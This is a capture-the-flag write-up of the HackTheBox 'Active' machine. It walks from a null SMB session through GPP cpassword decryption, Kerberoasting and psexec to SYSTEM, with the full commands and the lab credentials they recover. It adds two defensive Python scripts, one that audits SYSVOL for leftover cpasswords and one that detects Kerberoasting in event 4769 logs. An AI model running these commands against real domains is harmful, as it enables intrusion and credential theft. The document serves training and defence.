## Box Info

| Field | Value |
|---|---|
| Platform | HackTheBox |
| Difficulty | Easy |
| OS | Windows Server 2008 R2 |
| Key Techniques | GPP Password Decryption, Kerberoasting, PsExec |
## Attack Path Summary
SMB null session → Replication share has READ access → found Groups.xml with GPP-encrypted password → gpp-decrypt gave us SVC_TGS creds → BloodHound showed Administrator has an SPN → Kerberoasted Administrator → cracked with rockyou → psexec → Domain Admin.
First AD box ever. Full chain from zero creds to DA.
## Enumeration

```bash
echo "10.129.3.112 active.htb" | sudo tee -a /etc/hosts
```
### SMB — Null Session

```bash
ip=10.129.3.112
nxc smb $ip -u '' -p '' --shares
# Replication share has READ access — this is basically SYSVOL
```
Replication share readable with null creds. That’s the starting point.
## Foothold — GPP Passwords (Free Creds)
Browsed the Replication share and found the classic GPP attack path.
```bash
# Navigated to: Policies → Preferences → Groups → Groups.xml
# Found cpassword field + username: active.htb\SVC_TGS
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
# Result: GPPstillStandingStrong2k18
```
First creds: SVC_TGS:GPPstillStandingStrong2k18
The thing about GPP passwords — Microsoft published the AES key used to encrypt the cpassword field, so gpp-decrypt recovers the plaintext instantly. It's not even brute force, it's just decryption with a known key. Free creds.
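On the defender side the fix is to find every leftover cpassword in SYSVOL and delete it: MS14-025 stopped new GPP passwords from being saved, but it left the existing XML files in place, which is exactly what this box relies on. Below is an added audit script for this writeup (not a tool from the box or from any project) that walks a SYSVOL copy and reports every GPP item still carrying a cpassword. The list of item files, the account attribute names, the GPO folder name and the sample XML are all constructed for the demo; it reports the ciphertext length only and never decrypts anything.

```python
"""Audit a SYSVOL copy for Group Policy Preferences XML that still carries a
cpassword attribute. Added example for this writeup, not a tool from the box
or from any project; the defender's job is to find and delete these entries."""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP item types that can carry cpassword (assumption: the common set; extend as needed)
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attribute naming the account in each item type (assumption based on the GPP
# schema; whichever one is present gets reported)
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def find_cpasswords(sysvol_root):
    """Walk sysvol_root and return one finding per element with a non-empty cpassword."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                # Hand-edited or truncated file: skip it rather than abort the sweep
                continue
            for elem in tree.iter():
                cpw = elem.get("cpassword")
                if not cpw:          # attribute absent or already blanked out
                    continue
                account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "")
                findings.append({
                    "file": os.path.relpath(path, sysvol_root).replace(os.sep, "/"),
                    "element": elem.tag,
                    "account": account,
                    "cpassword_len": len(cpw),   # length only; never log the ciphertext itself
                })
    return findings


def build_sample_sysvol():
    """Create a constructed mini SYSVOL tree for the demo (not the box's real files)."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    gpo = os.path.join(root, "Policies", "{GPO-GUID-PLACEHOLDER}", "MACHINE", "Preferences")
    for sub in ("Groups", "Drives", "Services"):
        os.makedirs(os.path.join(gpo, sub))
    # Leftover local-user item with a cpassword: the one finding we expect
    with open(os.path.join(gpo, "Groups", "Groups.xml"), "w", encoding="utf-8") as f:
        f.write('<?xml version="1.0" encoding="utf-8"?>\n'
                '<Groups>\n'
                '  <User name="active.htb\\SVC_TGS" image="2">\n'
                '    <Properties action="U" userName="active.htb\\SVC_TGS" '
                'cpassword="CONSTRUCTED-NOT-A-REAL-CIPHERTEXT=="/>\n'
                '  </User>\n'
                '</Groups>\n')
    # Mapped drive with no stored credential: must not be flagged
    with open(os.path.join(gpo, "Drives", "Drives.xml"), "w", encoding="utf-8") as f:
        f.write('<Drives><Drive name="H:"><Properties action="U" path="\\\\fs01\\home" '
                'userName=""/></Drive></Drives>\n')
    # Service item whose cpassword was blanked during cleanup: must not be flagged
    with open(os.path.join(gpo, "Services", "Services.xml"), "w", encoding="utf-8") as f:
        f.write('<NTServices><NTService name="svc_backup"><Properties '
                'accountName="active.htb\\svc_backup" cpassword=""/></NTService></NTServices>\n')
    return root


if __name__ == "__main__":
    for hit in find_cpasswords(build_sample_sysvol()):
        print(f"{hit['file']}: <{hit['element']}> account={hit['account']!r} "
              f"cpassword ({hit['cpassword_len']} chars) still present")
```

Point it at a mounted copy of the SYSVOL (or Replication) share instead of `build_sample_sysvol()` and every hit is a credential that has to be rotated and an XML entry that has to be removed; blanking the attribute is not enough if the password is still in use elsewhere.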
## BloodHound

```bash
bloodhound-python -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -ns 10.129.3.112 -d active.htb -c All
# Found 5 users, 41 groups, 2 GPOs
# Uploaded JSON files to BloodHound CE at localhost:8080
```
BloodHound showed the Administrator account has an SPN set (active/CIFS:445). That means it's Kerberoastable.
## Privilege Escalation — Kerberoasting

Any authenticated domain user can request service tickets for accounts with SPNs. The ticket is encrypted with a key derived from the service account's password (its NT hash when RC4 is used), so it can be attacked offline — crack the ticket, crack the password.
```bash
impacket-GetUserSPNs active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip 10.129.3.112 -request -outputfile kerberoast.txt
# Found: Administrator with SPN active/CIFS:445
# Got krb5tgs hash
john kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Cracked: Ticketmaster1968
```
Domain Admin creds: Administrator:Ticketmaster1968
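The GetUserSPNs step above leaves a clear trace on the DC: every service ticket request is Security event 4769, and a roasting tool asks for RC4 tickets (TicketEncryptionType 0x17) for many SPN accounts in quick succession. Below is an added detection example for this writeup (not telemetry from the box or code from any project) that runs two rules over 4769 records: RC4 service tickets for non-machine accounts, and one requester pulling tickets for several distinct service accounts inside a short window. The sample events, the extra service account names (svc_sql, svc_web, svc_backup), the user jdoe, the timestamps and the IP are all constructed; the requester SVC_TGS and the SPN on Administrator come from the writeup.

```python
"""Kerberoasting detection over Windows Security event 4769 (A Kerberos service
ticket was requested). Added example for this writeup, not the box's own
telemetry. Signal 1: a service ticket issued with RC4-HMAC (TicketEncryptionType
0x17). Signal 2: one account requesting tickets for many distinct SPN-bearing
accounts in a short window."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"

# Constructed 4769 records, already parsed into the event's named fields.
# TargetUserName is the requester; ServiceName is the account that owns the SPN.
SAMPLE_EVENTS = [
    # normal traffic: computer account and TGT-related tickets, AES
    {"TimeCreated": "2024-01-15T09:00:05", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.0.0.99"},
    {"TimeCreated": "2024-01-15T09:00:06", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.0.0.99"},
    # another user legitimately hitting one AES-enabled service account
    {"TimeCreated": "2024-01-15T09:01:00", "TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.0.0.50"},
    # the roast: three RC4 tickets for three SPN accounts within seconds
    {"TimeCreated": "2024-01-15T09:05:10", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.0.0.99"},
    {"TimeCreated": "2024-01-15T09:05:12", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.0.0.99"},
    {"TimeCreated": "2024-01-15T09:05:15", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.0.0.99"},
    # a failed request: no ticket issued, nothing to crack
    {"TimeCreated": "2024-01-15T09:05:16", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "Status": "0x6", "IpAddress": "::ffff:10.0.0.99"},
]


def is_roastable_request(ev):
    """Only successful TGS requests for user/service accounts are worth cracking."""
    svc = ev["ServiceName"]
    if ev["Status"] != "0x0":               # failed request: no ticket was issued
        return False
    if svc.lower().startswith("krbtgt"):    # TGT-related, not a service account SPN
        return False
    if svc.endswith("$"):                   # computer accounts: long random passwords
        return False
    return True


def detect_kerberoasting(events, burst_threshold=3, window=timedelta(minutes=5)):
    """Return alerts: one 'rc4_tgs' per RC4 service ticket, one 'spn_burst' per user
    who requested tickets for >= burst_threshold distinct services inside window."""
    alerts = []
    per_user = defaultdict(list)           # requester -> [(time, service), ...]
    for ev in events:
        if not is_roastable_request(ev):
            continue
        user, svc = ev["TargetUserName"], ev["ServiceName"]
        if ev["TicketEncryptionType"] == RC4_HMAC:
            alerts.append({"rule": "rc4_tgs", "user": user, "service": svc, "ip": ev["IpAddress"]})
        per_user[user].append((datetime.fromisoformat(ev["TimeCreated"]), svc))
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            distinct = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(distinct) >= burst_threshold:
                alerts.append({"rule": "spn_burst", "user": user,
                               "distinct_services": len(distinct), "window_start": t0.isoformat()})
                break                      # one burst alert per user is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoasting(SAMPLE_EVENTS):
        print(alert)
```

One caveat for a Server 2008 R2 era domain like this one: user accounts get RC4 service tickets by default unless AES is enabled on the account, so the rc4_tgs rule alone is noisy there and the burst rule carries more weight. The real mitigation is the one the box fails: no SPN on Administrator, and long random passwords (or gMSAs) on the accounts that must have one, so a cracked ticket never yields anything.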
## Shell as SYSTEM

```bash
impacket-psexec active.htb/Administrator:'Ticketmaster1968'@10.129.3.112
```
Done.
## Credentials
| Username | Password | Source | Scope |
|---|---|---|---|
| SVC_TGS | GPPstillStandingStrong2k18 | GPP Groups.xml | Domain user |
| Administrator | Ticketmaster1968 | Kerberoasting | Domain Admin |
## What I Learned
GPP passwords in SYSVOL/Replication shares — any domain user (or even null session) can read Group Policy Preferences XML files. The cpassword field uses a published AES key. Always check for this.
Kerberoasting — any authenticated user can request TGS tickets for accounts with SPNs. If the password is weak, you crack the ticket offline. The Administrator having an SPN was the kill shot here.
The eCPPTv3 AD chain works on real boxes: Setup → find creds (GPP) → BloodHound → Kerberoasting → crack → psexec → Domain Admin.
Pattern: “Null SMB access + SYSVOL/Replication share = check for GPP passwords immediately. Then BloodHound everything.”